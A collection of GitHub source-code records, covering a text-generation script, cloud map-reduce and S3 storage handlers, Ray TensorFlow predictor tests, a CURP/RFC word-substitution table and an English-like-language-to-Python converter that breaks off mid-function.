c))\r\nprint(f\"{year}년{month}월{day}일 {input_day}요일부터 100일 뒤는 {a}년{b}월{c}일 {d}요일\")\r\n","repo_name":"Narks-Jun/Python_study_5Week","sub_path":"5 Week Mission Q4(100 day calculator(Base is 2022, ignore leap years).py","file_name":"5 Week Mission Q4(100 day calculator(Base is 2022, ignore leap years).py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"44083445169","text":"#!/usr/bin/env python\n\nfrom argparse import ArgumentParser\n\nfrom transformers.models.auto.configuration_auto import CONFIG_MAPPING\nfrom transformers.models.auto.modeling_auto import AutoModelForCausalLM\nfrom transformers.models.auto.modeling_auto import MODEL_FOR_CAUSAL_LM_MAPPING\nfrom transformers.models.auto.tokenization_auto import TOKENIZER_MAPPING\nfrom transformers.models.auto.tokenization_auto import AutoTokenizer\nfrom transformers.pipelines.text_generation import TextGenerationPipeline\nfrom transformers.models.t5.configuration_t5 import T5Config\n\nfrom uniformers.models.bygpt5 import ByGPT5Config, ByGPT5LMHeadModel, ByGPT5Tokenizer\n\n# fix some warnings inside pipeline\n# we need to add this to to be able to use ByGPT5 with AutoModel\nCONFIG_MAPPING.register(ByGPT5Config.model_type, ByGPT5Config)\nTOKENIZER_MAPPING.register(ByGPT5Config, (ByGPT5Tokenizer, None))\nMODEL_FOR_CAUSAL_LM_MAPPING.register(ByGPT5Config, ByGPT5LMHeadModel)\nMODEL_FOR_CAUSAL_LM_MAPPING.register(T5Config, ByGPT5LMHeadModel)\n\n\ndef generate(model_name, prompt, device, min_length=512, max_length=1024):\n pipeline = TextGenerationPipeline(\n model=AutoModelForCausalLM.from_pretrained(model_name),\n tokenizer=AutoTokenizer.from_pretrained(model_name),\n device=device,\n )\n return pipeline(\n prompt,\n min_length=min_length,\n max_length=max_length,\n do_sample=True,\n #num_beams=5,\n # same default settings as textsynth.com\n top_k=40,\n temperature=1,\n top_p=0.9,\n )[0][\"generated_text\"]\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\"Generate text using a pretrained ByGPT5 model.\"\n )\n parser.add_argument(\"--prompt\", help=\"prompt to complete\", required=True)\n 
parser.add_argument(\n        \"--model_name_or_path\",\n        default=\"google/byt5-small\",\n        help=\"name of the model in huggingface hub or path if local\",\n    )\n    parser.add_argument(\n        \"--device\",\n        default=-1,\n        type=int,\n        help=\"device ordinal for cpu/gpu, setting this to -1 will leverage cpu\",\n    )\n    args = parser.parse_args()\n    print(generate(args.model_name_or_path, args.prompt, args.device))\n","repo_name":"potamides/uniformers","sub_path":"examples/inference/lm_generate.py","file_name":"lm_generate.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"86"} +{"seq_id":"20967882548","text":"import master\nfrom google.cloud import storage\nfrom collections import defaultdict\nimport json\n\ndef master_main(request):\n    \"\"\"Responds to any HTTP request.\n    Args:\n        request (flask.Request): HTTP request object.\n    Returns:\n        The response text or any set of values that can be turned into a\n        Response object using\n        `make_response `.\n    \"\"\"\n    request_json = request.get_json()\n    if request.args and 'message' in request.args:\n        return request.args.get('message')\n    elif request_json and 'message' in request_json:\n        return request_json['message']\n    else:\n        # return f'Hello World!'\n        print(\"Inside main function\")\n        m = master.Master()\n        print(\"Created master object\")\n        n_mappers = 3\n        n_reducers = 3\n        map_paths = m.split_files('A Room With A View.txt', n_mappers, flag = None)\n        m.run_mapper(n_mappers, map_paths)\n        m.run_reducer(n_mappers, n_reducers)\n\n        storage_client = storage.Client()\n        output_bucket = storage.Bucket(storage_client, \"output_anurag\")\n\n\n        final_dict = defaultdict()\n        blobs = output_bucket.list_blobs()\n        for blob in blobs:\n            # fileName = blob.name\n            partition_kv = defaultdict()\n            with blob.open(\"r\") as f:\n                partition_kv = json.load(f)\n            final_dict.update(partition_kv)\n            blob.delete()\n\n        output_blob = output_bucket.blob(\"output.txt\").open(\"w\")\n        output_blob.write(json.dumps(final_dict))\n        output_blob.close()\n\n        m.delete_files()\n        return f\"Finished processing\"","repo_name":"anuraghambir/Map-Reduce-GCP","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"3433956709","text":"import pandas as pd\nimport requests, argparse\nimport os, json\nimport numpy as np\nimport math\n\ndata = pd.read_csv('../data/covid19_wordwide_data.csv')\ndata = data.replace(np.nan, 'NaN')\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--server_address', type=str, default='http://127.0.0.1:5000/', help='The IP address that hosts the API')\n    parser.add_argument('--method', type=str, default='ingest', help='ingest/clear')\n    return parser.parse_args()\n\nif __name__ == \"__main__\":\n    args = parse_args()\n\n    # batch ingesting\n    if args.method == 'ingest':\n        ingested_dict = data.loc[data.index,:].to_dict(orient='records')\n        request = requests.post(args.server_address+'ingestion', json=ingested_dict)\n        print('Request status:', request.reason)\n\n    # clear table\n    elif args.method == 'clear':\n        request = requests.post(args.server_address+'clear', json={})\n        print('Request status:', request.reason)\n\n    
","repo_name":"phihd/big-data-platform-assignment-1","sub_path":"code/from_consumer-producer_to_daas.py","file_name":"from_consumer-producer_to_daas.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70356518363","text":"CURP_NON_CONVENIENT_WORDS = {\n \"BACA\": \"BXCA\",\n \"LOCO\": \"LXCO\",\n \"BAKA\": \"BXKA\",\n \"LOKA\": \"LXKA\",\n \"BUEI\": \"BXEI\",\n \"LOKO\": \"LXKO\",\n \"BUEY\": \"BXEY\",\n \"MAME\": \"MXME\",\n \"CACA\": \"CXCA\",\n \"MAMO\": \"MXMO\",\n \"CACO\": \"CXCO\",\n \"MEAR\": \"MXAR\",\n \"CAGA\": \"CXGA\",\n \"MEAS\": \"MXAS\",\n \"CAGO\": \"CXGO\",\n \"MEON\": \"MXON\",\n \"CAKA\": \"CXKA\",\n \"MIAR\": \"MXAR\",\n \"CAKO\": \"CXKO\",\n \"MION\": \"MXON\",\n \"COGE\": \"CXGE\",\n \"MOCO\": \"MXCO\",\n \"COGI\": \"CXGI\",\n \"MOKO\": \"MXKO\",\n \"COJA\": \"CXJA\",\n \"MULA\": \"MXLA\",\n \"COJE\": \"CXJE\",\n \"MULO\": \"MXLO\",\n \"COJI\": \"CXJI\",\n \"NACA\": \"NXCA\",\n \"COJO\": \"CXJO\",\n \"NACO\": \"NXCO\",\n \"COLA\": \"CXLA\",\n \"PEDA\": \"PXDA\",\n \"CULO\": \"CXLO\",\n \"PEDO\": \"PXDO\",\n \"FALO\": \"FXLO\",\n \"PENE\": \"PXNE\",\n \"FETO\": \"FXTO\",\n \"PIPI\": \"PXPI\",\n \"GETA\": \"GXTA\",\n \"PITO\": \"PXTO\",\n \"GUEI\": \"GXEI\",\n \"POPO\": \"PXPO\",\n \"GUEY\": \"GXEY\",\n \"PUTA\": \"PXTA\",\n \"JETA\": \"JXTA\",\n \"PUTO\": \"PXTO\",\n \"JOTO\": \"JXTO\",\n \"QULO\": \"QXLO\",\n \"KACA\": \"KXCA\",\n \"RATA\": \"RXTA\",\n \"KACO\": \"KXCO\",\n \"ROBA\": \"RXBA\",\n \"KAGA\": \"KXGA\",\n \"ROBE\": \"RXBE\",\n \"KAGO\": \"KXGO\",\n \"ROBO\": \"RXBO\",\n \"KAKA\": \"KXKA\",\n \"RUIN\": \"RXIN\",\n \"KAKO\": \"KXKO\",\n \"SENO\": \"SXNO\",\n \"KOGE\": \"KXGE\",\n \"TETA\": \"TXTA\",\n \"KOGI\": \"KXGI\",\n \"VACA\": \"VXCA\",\n \"KOJA\": \"KXJA\",\n \"VAGA\": \"VXGA\",\n \"KOJE\": \"KXJE\",\n \"VAGO\": \"VXGO\",\n \"KOJI\": \"KXJI\",\n \"VAKA\": \"VXKA\",\n \"KOJO\": \"KXJO\",\n \"VUEI\": \"VXEI\",\n \"KOLA\": \"KXLA\",\n \"VUEY\": \"VXEY\",\n \"KULO\": \"KXLO\",\n \"WUEI\": \"WXEI\",\n \"LILO\": \"LXLO\",\n \"WUEY\": \"WXEY\",\n \"LOCA\": \"LXCA\",\n}\n\nRFC_NON_CONVENIENT_WORDS = {\n \"BUEI\": \"BUEX\",\n \"KOGE\": \"KOGX\",\n \"BUEY\": \"BUEX\",\n \"KOJO\": \"KOJX\",\n \"CACA\": \"CACX\",\n \"KAKA\": \"KAKX\",\n \"CACO\": \"CACX\",\n \"KULO\": \"KULX\",\n \"CAGA\": \"CAGX\",\n \"MAME\": \"MAMX\",\n \"CAGO\": \"CAGX\",\n \"MAMO\": \"MAMX\",\n \"CAKA\": \"CAKX\",\n \"MEAR\": \"MEAX\",\n \"COGE\": \"COGX\",\n \"MEON\": \"MEOX\",\n \"COJA\": \"COJX\",\n \"MION\": \"MIOX\",\n \"COJE\": \"COJX\",\n \"MOCO\": \"MOCX\",\n \"COJI\": \"COJX\",\n \"MULA\": \"MULX\",\n \"COJO\": \"COJX\",\n \"PEDA\": \"PEDX\",\n \"CULO\": \"CULX\",\n \"PEDO\": \"PEDX\",\n \"FETO\": \"FETX\",\n \"PENE\": \"PENX\",\n \"GUEY\": \"GUEX\",\n \"PUTA\": \"PUTX\",\n \"JOTO\": \"JOTX\",\n \"PUTO\": \"PUTX\",\n \"KACA\": \"KACX\",\n \"QULO\": \"QULX\",\n \"KACO\": \"KACX\",\n \"RATA\": \"RATX\",\n \"KAGA\": \"KAGX\",\n \"RUIN\": \"RUIX\",\n \"KAGO\": \"KAGX\",\n}\n","repo_name":"hectorip/mxcurpy","sub_path":"mxcurpy/non_convenient_words.py","file_name":"non_convenient_words.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"jv","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"2511964591","text":"# coding: utf-8\n\n\nimport boto3\n\nfrom rekcurd_dashboard.models import DataServerModel\nfrom .data_handler import DataHandler\n\n\nclass AwsS3Handler(DataHandler):\n \"\"\"AwsS3Handler\n \"\"\"\n def _initialize(self, 
data_server_model: DataServerModel):\n resource = boto3.resource(\n 's3',\n aws_access_key_id=data_server_model.aws_access_key,\n aws_secret_access_key=data_server_model.aws_secret_key,\n )\n bucket_name = data_server_model.aws_bucket_name\n return resource, bucket_name\n\n def download(self, data_server_model: DataServerModel, remote_filepath: str, local_filepath: str) -> None:\n resource, bucket_name = self._initialize(data_server_model)\n resource.Bucket(bucket_name).download_file(remote_filepath, local_filepath)\n\n def upload(self, data_server_model: DataServerModel, remote_filepath: str, local_filepath: str) -> None:\n resource, bucket_name = self._initialize(data_server_model)\n resource.Bucket(bucket_name).upload_file(local_filepath, remote_filepath)\n\n def delete(self, data_server_model: DataServerModel, filepath: str) -> None:\n resource, bucket_name = self._initialize(data_server_model)\n resource.Object(bucket_name, filepath).delete()\n","repo_name":"rekcurd/dashboard","sub_path":"rekcurd_dashboard/data_servers/aws_s3_handler.py","file_name":"aws_s3_handler.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"86"} +{"seq_id":"23567732464","text":"import re\nfrom typing import Tuple\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nimport tensorflow as tf\n\nfrom ray.air.constants import MAX_REPR_LENGTH\nfrom ray.air.util.data_batch_conversion import (\n _convert_batch_type_to_pandas,\n _convert_pandas_to_batch_type,\n)\nfrom ray.data.preprocessor import Preprocessor\nfrom ray.train.predictor import TYPE_TO_ENUM\nfrom ray.train.tensorflow import TensorflowCheckpoint, TensorflowPredictor\nfrom ray.train.tests.dummy_preprocessor import DummyPreprocessor\n\n\ndef build_raw_model() -> tf.keras.Model:\n model = tf.keras.Sequential(\n [\n tf.keras.layers.InputLayer(input_shape=()),\n # Add feature dimension, expanding (batch_size,) to (batch_size, 1).\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(1),\n ]\n )\n return model\n\n\nweights = [np.array([[2.0]]), np.array([0.0])]\n\n\ndef build_model() -> tf.keras.Model:\n model = build_raw_model()\n model.set_weights(weights)\n return model\n\n\ndef build_model_multi_input() -> tf.keras.Model:\n input1 = tf.keras.layers.Input(shape=(1,), name=\"A\")\n input2 = tf.keras.layers.Input(shape=(1,), name=\"B\")\n output = tf.keras.layers.Add()([input1, input2])\n model = tf.keras.models.Model(inputs=[input1, input2], outputs=output)\n return model\n\n\ndef build_model_multi_output() -> tf.keras.Model:\n input = tf.keras.layers.Input(shape=1)\n model = tf.keras.models.Model(inputs=input, outputs={\"a\": input, \"b\": input})\n return model\n\n\ndef build_model_unsupported() -> tf.keras.Model:\n \"\"\"Builds a model with unsupported output type.\"\"\"\n input = tf.keras.layers.Input(shape=1)\n model = tf.keras.models.Model(inputs=input, outputs=[input, input])\n return model\n\n\ndef test_repr():\n predictor = TensorflowPredictor(model=build_model())\n\n representation = repr(predictor)\n\n assert len(representation) < MAX_REPR_LENGTH\n pattern = re.compile(\"^TensorflowPredictor\\\\((.*)\\\\)$\")\n assert pattern.match(representation)\n\n\ndef create_checkpoint_preprocessor() -> Tuple[TensorflowCheckpoint, Preprocessor]:\n preprocessor = DummyPreprocessor()\n checkpoint = TensorflowCheckpoint.from_model(\n build_model(), preprocessor=preprocessor\n )\n\n return checkpoint, preprocessor\n\n\ndef test_init():\n checkpoint, preprocessor = 
create_checkpoint_preprocessor()\n\n predictor = TensorflowPredictor(model=build_model(), preprocessor=preprocessor)\n\n checkpoint_predictor = TensorflowPredictor.from_checkpoint(checkpoint)\n\n assert checkpoint_predictor._model.get_weights() == predictor._model.get_weights()\n assert checkpoint_predictor.get_preprocessor() == predictor.get_preprocessor()\n\n\ndef test_tensorflow_checkpoint():\n model = build_model()\n model.build(input_shape=(1,))\n preprocessor = DummyPreprocessor()\n\n checkpoint = TensorflowCheckpoint.from_model(model, preprocessor=preprocessor)\n assert checkpoint.get_model().get_weights() == model.get_weights()\n\n with checkpoint.as_directory() as path:\n checkpoint = TensorflowCheckpoint.from_directory(path)\n checkpoint_preprocessor = checkpoint.get_preprocessor()\n assert checkpoint.get_model().get_weights() == model.get_weights()\n assert checkpoint_preprocessor == preprocessor\n\n\n@pytest.mark.parametrize(\"use_gpu\", [False, True])\ndef test_predict_array(use_gpu):\n predictor = TensorflowPredictor(model=build_model(), use_gpu=use_gpu)\n\n data_batch = np.asarray([1, 2, 3])\n predictions = predictor.predict(data_batch)\n\n assert len(predictions) == 1\n # [1 2 3] returns [[2],[4],[6]] with shape: (3,1) from Tensorflow model\n np.testing.assert_array_equal(\n predictions[\"predictions\"], np.asarray([[2], [4], [6]])\n )\n\n\n@pytest.mark.parametrize(\"use_gpu\", [False, True])\ndef test_predict_array_with_preprocessor(use_gpu):\n preprocessor = DummyPreprocessor()\n predictor = TensorflowPredictor(\n model=build_model(),\n preprocessor=preprocessor,\n use_gpu=use_gpu,\n )\n\n data_batch = np.array([1, 2, 3])\n predictions = predictor.predict(data_batch)\n\n assert len(predictions) == 1\n # [1 2 3] returns [[2],[4],[6]] with shape: (3,1) from Tensorflow model\n np.testing.assert_array_equal(\n predictions[\"predictions\"], np.asarray([[2], [4], [6]])\n )\n assert predictor.get_preprocessor().has_preprocessed\n\n\n@pytest.mark.parametrize(\"batch_type\", [np.ndarray, pd.DataFrame, dict])\ndef test_predict(batch_type):\n predictor = TensorflowPredictor(model=build_model_multi_input())\n\n raw_batch = pd.DataFrame({\"A\": [0.0, 0.0, 0.0], \"B\": [1.0, 2.0, 3.0]})\n data_batch = _convert_pandas_to_batch_type(raw_batch, type=TYPE_TO_ENUM[batch_type])\n raw_predictions = predictor.predict(data_batch)\n predictions = _convert_batch_type_to_pandas(raw_predictions)\n\n assert len(predictions) == 3\n assert predictions.to_numpy().flatten().tolist() == [1.0, 2.0, 3.0]\n\n\n@pytest.mark.parametrize(\"use_gpu\", [False, True])\ndef test_predict_dataframe(use_gpu):\n predictor = TensorflowPredictor(model=build_model_multi_input(), use_gpu=use_gpu)\n\n data_batch = pd.DataFrame({\"A\": [0.0, 0.0, 0.0], \"B\": [1.0, 2.0, 3.0]})\n predictions = predictor.predict(data_batch)\n\n assert len(predictions) == 3\n assert predictions.to_numpy().flatten().tolist() == [1.0, 2.0, 3.0]\n\n\n@pytest.mark.parametrize(\"use_gpu\", [False, True])\ndef test_predict_multi_output(use_gpu):\n predictor = TensorflowPredictor(model=build_model_multi_output(), use_gpu=use_gpu)\n\n data_batch = np.array([1, 2, 3])\n predictions = predictor.predict(data_batch)\n\n # Model outputs two tensors\n assert len(predictions) == 2\n for k, v in predictions.items():\n # Each tensor is of size 3\n assert len(v) == 3\n assert v.flatten().tolist() == [1, 2, 3]\n\n\ndef test_predict_unsupported_output():\n \"\"\"Tests predictions with models that have unsupported output types.\"\"\"\n predictor = 
TensorflowPredictor(model=build_model_unsupported())\n\n data_batch = np.array([1, 2, 3])\n # Unsupported output should fail\n with pytest.raises(ValueError):\n predictor.predict(data_batch)\n\n # Using a CustomPredictor should pass.\n class CustomPredictor(TensorflowPredictor):\n def call_model(self, tensor):\n model_output = super().call_model(tensor)\n return {str(i): model_output[i] for i in range(len(model_output))}\n\n predictor = CustomPredictor(model=build_model_unsupported())\n predictions = predictor.predict(data_batch)\n\n # Model outputs two tensors\n assert len(predictions) == 2\n for k, v in predictions.items():\n # Each tensor is of size 3\n assert len(v) == 3\n assert v.flatten().tolist() == [1, 2, 3]\n\n\nif __name__ == \"__main__\":\n import sys\n\n sys.exit(pytest.main([\"-v\", \"-x\", __file__]))\n","repo_name":"ray-project/ray","sub_path":"python/ray/train/tests/test_tensorflow_predictor.py","file_name":"test_tensorflow_predictor.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","stars":28715,"dataset":"github-code","pt":"86"} +{"seq_id":"3868601533","text":"from collections import defaultdict\nfrom itertools import combinations\nm,n = list(map(int,input().split()))\ndata = []\nfor i in range(m):\n temp = list(map(int,input().split()))\n data.append(temp)\ndx = [0,1,0,-1]\ndy = [1,0,-1,0]\npos = 0\nused = [[0]*n for i in range(m)]\nres = []\nx = 0\ny = 0\nfor i in range(m*n):\n res.append(data[x][y])\n used[x][y] = 1\n a = dx[pos] + x\n b = dy[pos] + y\n if a<0 or b<0 or a>=m or b>=n or used[a][b]:\n pos=(pos+1)%4\n x = dx[pos] + x\n y = dy[pos] + y\n else:\n x = a\n y = b\nlast = m*n-1\nfor i in range(m*n):\n if i == last:\n print(res[i])\n else:\n print(res[i],end=',')\n","repo_name":"HotView/PycharmProjects","sub_path":"Exercise_for_Job/002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"12892150097","text":"import os\nimport re\nfrom datetime import datetime\n\n\n# The EngLangConverter class contains static methods for converting code written in a custom\n# English-like language to Python syntax.\nclass EngLangConverter:\n @staticmethod\n def convert(code):\n \"\"\"\n The function converts a given code from a custom English-like language to Python.\n\n :param code: a string containing the code to be converted from English-like syntax to Python\n syntax\n :return: The `convert` method is returning a string that represents the converted code.\n \"\"\"\n code = code.replace(\"PROGRAM\", \"\").replace(\"END PROGRAM\", \"\").strip()\n code = EngLangConverter.replace_import(code)\n code = EngLangConverter.replace_init(code)\n code = EngLangConverter.replace_class_with_indent(code)\n code = EngLangConverter.replace_function_with_indent(code)\n # code = EngLangConverter.convert_keywords(code)\n code = EngLangConverter.convert_set_statements(code)\n code = EngLangConverter.convert_if_statements(code)\n code = EngLangConverter.convert_while_statements(code)\n code = EngLangConverter.convert_for_statements(code)\n code = EngLangConverter.convert_comparison_statements(code)\n code = EngLangConverter.convert_arithmetic_ops(code)\n code = EngLangConverter.replace_display(code)\n code = EngLangConverter.replace_new_and_return_and_end(code)\n code = EngLangConverter.convert_variables_to_type(code)\n\n lines = code.split(\"\\n\")\n output_lines = []\n\n for line in lines:\n if line.startswith(\" \"):\n line 
= line[4:]\n            if line.strip() == \"\" and output_lines and output_lines[-1].strip() == \"\":\n                continue\n            output_lines.append(line)\n\n        return \"\\n\".join(output_lines)\n\n    @staticmethod\n    def get_program_name(code):\n        \"\"\"\n        The function extracts the name of a program from a given code.\n\n        :param code: a string that represents the source code of a program written\n        in a programming language.\n        :return: the program name as a string, or None if not found.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Getting program name...\")\n        program_line = code.split(\"\\n\")[0]\n        program_name = program_line.replace(\"PROGRAM\", \"\").strip()\n        return program_name if program_name else None\n\n    @staticmethod\n    def replace_import(code):\n        \"\"\"\n        This function replaces \"IMPORT\" statements in Python code with \"from [module] import *\".\n\n        :param code: a string containing the code to be compiled\n        :return: the modified code with import statements replaced using regular expression.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Replacing import statements...\")\n        return re.sub(r\"IMPORT (.+)\", r\"from \\1 import *\", code)\n\n    @staticmethod\n    def replace_init(code):\n        \"\"\"\n        This function replaces \"INIT\" statements in a given code with a Python class constructor\n        \"__init__\" statement.\n\n        :param code: a string containing the code to be compiled\n        :return: the modified code with the \"INIT\" statements replaced with a Python class constructor\n        \"__init__\" method.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Replacing init statements...\")\n        return re.sub(r\"INIT (.+)\", r\"def __init__(self, \\1):\", code)\n\n    @staticmethod\n    def replace_class_with_indent(code):\n        \"\"\"\n        This function replaces \"CLASS\" statements with \"class\" and removes \"END CLASS\" in a given code.\n\n        :param code: The input code that needs to be processed and have class statements replaced with\n        Python syntax\n        :return: the modified code with the class statements replaced with Python syntax.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Replacing class statements...\")\n        return re.sub(r\"CLASS (.+)\", r\"class \\1:\", code).replace(\"END CLASS\", \"\")\n\n    @staticmethod\n    def replace_function_with_indent(code):\n        \"\"\"\n        The function replaces function statements in a given code with properly indented Python function\n        definitions.\n\n        :param code: a string containing the code to be processed and modified by the function\n        :return: the modified code with the function statements replaced with Python function\n        definitions.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Replacing function statements...\")\n        functions_re = r\"(FUNCTION (.+) TAKES (.+)([\\s\\S]+?))(?=FUNCTION|END PROGRAM)\"\n        function_definitions = re.findall(functions_re, code)\n\n        for function_block, function, parameters, function_body in function_definitions:\n            # escape the matched block before splicing it into a new pattern, since the\n            # captured source text may contain regex metacharacters such as parentheses\n            inside_class = re.search(\"class [\\\\s\\\\S]+?\" + re.escape(function_block), code)\n            new_parameters = f\"self, {parameters}\" if inside_class else parameters\n            new_function = f\"def {function}({new_parameters}):\"\n            code = code.replace(function_block, new_function + function_body)\n\n        return code\n\n    @staticmethod\n    def convert_keywords(code):\n        \"\"\"\n        This function converts keywords in a given code to Python syntax.\n\n        :param code: a string containing the code to be processed and modified by the function\n        :return: the modified code with the keywords replaced with Python syntax.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Converting keywords...\")\n        # str.replace returns a new string, so each result must be kept and returned\n        code = code.replace(\"AND\", \"and\").replace(\"OR\", \"or\").replace(\"IN\", \"in\")\n        code = code.replace(\"NOT\", \"not\").replace(\"TRUE\", \"True\").replace(\"FALSE\", \"False\")\n        return code\n\n    @staticmethod\n    def convert_set_statements(code):\n        \"\"\"\n        This function converts \"SET\" statements in code to variable assignments in Python.\n\n        :param code: The code parameter is a string that represents a block of code that may contain\n        \"SET\" statements\n        :return: the modified code with the \"SET\" statements replaced with variable assignments.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Converting set statements...\")\n        return re.sub(r\"SET (.+) TO \", r\"\\1 = \", code)\n\n    @staticmethod\n    def convert_if_statements(code):\n        \"\"\"\n        This function converts IF statements in a given code string to Python syntax.\n\n        :param code: a string containing code written in a language that uses \"IF\", \"THEN\", \"ELSE\", and\n        \"END IF\" statements\n        :return: the modified code with if statements converted to Python syntax.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Converting if statements...\")\n        code = re.sub(r\"IF (.*) THEN\", r\"if \\1:\", code)\n        code = code.replace(\"ELSE\", \"else:\")\n        return code.replace(\"END IF\", \"\")\n\n    @staticmethod\n    def convert_while_statements(code):\n        \"\"\"\n        This function converts WHILE statements in a given code string to Python syntax.\n\n        :param code: a string containing code written in a language that uses \"WHILE\" and \"END WHILE\"\n        statements\n        :return: the modified code with while statements converted to Python syntax.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Converting while statements...\")\n        return re.sub(r\"WHILE (.*)\", r\"while \\1:\", code).replace(\"END WHILE\", \"\")\n\n    @staticmethod\n    def convert_for_statements(code):\n        \"\"\"\n        This function converts FOR statements in a given code string to Python syntax.\n\n        :param code: a string containing code written in a language that uses \"FOR\" and \"END FOR\"\n        statements\n        :return: the modified code with for statements converted to Python syntax.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Converting for statements...\")\n        code = code.replace(\" DO\", \"\")\n        return re.sub(r\"FOR (.*)\", r\"for \\1:\", code).replace(\"END FOR\", \"\")\n\n    @staticmethod\n    def convert_comparison_statements(code):\n        \"\"\"\n        The function replaces comparison statements in a given code with their corresponding symbols.\n\n        :param code: a string containing the code to be modified\n        :return: the modified code with the comparison statements replaced with their corresponding\n        symbols.\n        \"\"\"\n        print(\"[ EngLang Compiler ] Replacing comparison statements...\")\n        # substitute the longer compound phrases first so that \"IS GREATER THAN OR EQUAL TO\"\n        # is not partially consumed by the shorter \"IS GREATER THAN\" pattern\n        code = re.sub(r\"IS GREATER THAN OR EQUAL TO\", \">=\", code)\n        code = re.sub(r\"IS LESS THAN OR EQUAL TO\", \"<=\", code)\n        code = re.sub(r\"IS GREATER THAN\", \">\", code)\n        code = re.sub(r\"IS LESS THAN\", \"<\", code)\n        return re.sub(r\"IS NOT EQUAL TO\", \"!=\", code)\n\n    @staticmethod\n    def convert_arithmetic_ops(code):\n        \"\"\"\n        This function converts the words \"PLUS\" and \"MINUS\" in a given code string to their\n        corresponding arithmetic operators \"+\" and \"-\".\n\n        :param code: a string containing code that needs to be compiled and converted\n        :return: the modified code with the arithmetic operations converted from their English language\n        equivalents (\"PLUS\" and \"MINUS\") to their corresponding mathematical symbols (\"+\" and \"-\").\n        \"\"\"\n        print(\"[ EngLang Compiler ] Converting arithmetic operations...\")\n        code = re.sub(r\"PLUS\", \"+\", code)\n        code = re.sub(r\"MINUS\", \"-\", code)\n        code = re.sub(r\"TIMES\", \"*\", code)\n        code = re.sub(r\"DIVIDED BY\", \"/\", code)\n        
code = re.sub(r\"MODULO\", \"%\", code)\n return re.sub(r\"TO THE POWER OF\", \"**\", code)\n\n @staticmethod\n def replace_display(code):\n \"\"\"\n This function replaces \"DISPLAY\" statements in code with \"print\" statements.\n\n :param code: The code parameter is a string that represents a program written in a programming\n language. The function is designed to replace any display statements in the code with print\n statements\n :return: the modified code with the display statements replaced with print statements.\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing display statements...\")\n return re.sub(r\"DISPLAY ?(.+)\", r\"print(\\1)\", code)\n\n @staticmethod\n def replace_new_and_return(code):\n \"\"\"\n The function replaces \"NEW\" statements with empty parentheses and \"RETURN\" statements with\n \"return\", removes \"END FUNCTION\" statements, and replaces \"JOIN\" statements with \"+\".\n\n :param code: a string containing the code to be processed and modified\n :return: the modified code with \"NEW\" statements replaced with function calls, \"RETURN\"\n statements replaced with \"return\" keyword, \"END FUNCTION\" removed, and \"JOIN\" replaced with \"+\".\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing new and return statements...\")\n code = re.sub(r\"NEW (.+)\\(\\)\", r\"\\1()\", code)\n code = code.replace(\"RETURN\", \"return\").replace(\"END FUNCTION\", \"\")\n return code.replace(\"JOIN\", \"+\")\n\n @staticmethod\n def replace_new_and_return_and_end(code):\n \"\"\"\n The function replaces certain statements in a given code string and returns the modified string.\n\n :param code: a string containing the code to be processed and modified\n :return: The modified code with \"NEW\" statements replaced with function calls, \"RETURN\"\n statements replaced with \"return\" keyword, \"END FUNCTION\" removed, \"JOIN\" replaced with \"+\",\n and \"END\" removed.\n \"\"\"\n print(\"[ EngLang Compiler ] Replacing new and return and end statements...\")\n code = re.sub(r\"NEW (.+)\\(\\)\", r\"\\1()\", code)\n code = code.replace(\"RETURN\", \"return\").replace(\"END FUNCTION\", \"\")\n return code.replace(\"JOIN\", \"+\").replace(\"END\", \"\")\n\n @staticmethod\n def convert_variables_to_type(code):\n \"\"\"\n The function converts variables in a given code to a specified data type.\n\n :param code: a string containing the code to be compiled\n :return: the modified code with variables converted to their specified data types.\n \"\"\"\n print(\"[ EngLang Compiler ] Converting variables to type...\")\n conversions = re.findall(r\"([\\w_]+?)\\s+TO\\s+(STRING|INT|FLOAT)\", code)\n for variable, data_type in conversions:\n if data_type == \"STRING\":\n conversion_func = \"str\"\n elif data_type == \"INT\":\n conversion_func = \"int\"\n elif data_type == \"FLOAT\":\n conversion_func = \"float\"\n code = code.replace(\n f\"{variable} TO {data_type}\", f\"{conversion_func}({variable})\"\n )\n return code\n\n\ndef main():\n \"\"\"\n This function prompts the user for an EngLang file location, author name, and license name, converts\n the EngLang code to Python code using EngLangConverter, writes the Python code to a file with\n metadata, and optionally runs the generated code.\n \"\"\"\n print(\"Welcome to MostlyWhat's EngLang Compiler!\")\n file_location = input(\"Enter the EngLang file location (.enlg): \")\n author = input(\"Enter the code author's name: \")\n file_license = input(\"Enter the license name: \")\n\n with open(file_location, \"r\") as f:\n englang_code = f.read()\n\n 
